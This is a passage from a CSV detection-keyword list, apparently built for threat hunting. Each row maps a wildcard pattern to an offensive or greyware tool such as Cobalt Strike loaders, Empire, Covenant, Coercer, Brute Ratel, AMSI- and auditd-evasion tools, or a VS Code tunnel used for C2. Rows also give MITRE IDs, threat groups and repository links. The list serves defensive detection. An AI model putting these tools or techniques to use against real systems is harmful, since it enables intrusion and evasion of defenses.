Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*cobaltstrike/*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics 
and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*cobaltstrike_*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 
- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*cobaltstrike-dist.tgz*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*cobbr/Covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*cobbr/Elite*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*cobbr/PSAmsi*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*cocfojppfigjeefejbpfmedgjbpchcng*","greyware_tool_keyword","SaferVPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*code.exe tunnel --accept-server-license-terms --name *","greyware_tool_keyword","vscode","Starts a reverse connection over global.rel.tunnels.api.visualstudio.com via websockets","T1090.003 - T1059.001 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://badoption.eu/blog/2023/01/31/code_c2.html","1","0","risk of False positive","10","10","N/A","N/A","N/A","N/A" +"*code_execution/*.dll*","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1075","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*code_execution/*.exe*","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1135","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*code_execution/*.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1136","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*CodeExec-D37DA402-3829-492F-90D0-8EC3909514EB.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*CodeLoad(shellcode)*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. 
currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","0","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" +"*codeload.github.com/*","greyware_tool_keyword","github","Github executables download initiated - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*codeLoader/codeLoader.*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 
- T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" +"*codewatchorg/bypasswaf*","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/bypasswaf","1","1","N/A","N/A","4","323","117","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z" +"*codewatchorg/sqlipy*","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","247","102","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" +"*codewhitesec/apollon*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" +"*codewhitesec/daphne*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" +"*Coercer coerce*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - 
T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer -d * -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Coercer fuzz*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*Coercer scan*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.core*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.methods*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.models*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.network*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*Coercer.py *","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.structures*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer/core/loader*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*coff_definitions.h*","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","156","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" +"*COFF_Loader.*","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 
- T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","156","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" +"*COFF_PREP_BEACON*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens 
- Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" +"*CoffeeLdr* go *","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" +"*CoffeeLdr.x64.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z"
+"*CoffeeLdr.x86.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z"
+"*COFFELDR_COFFELDR_H*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z"
+"*coffexec *.o *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
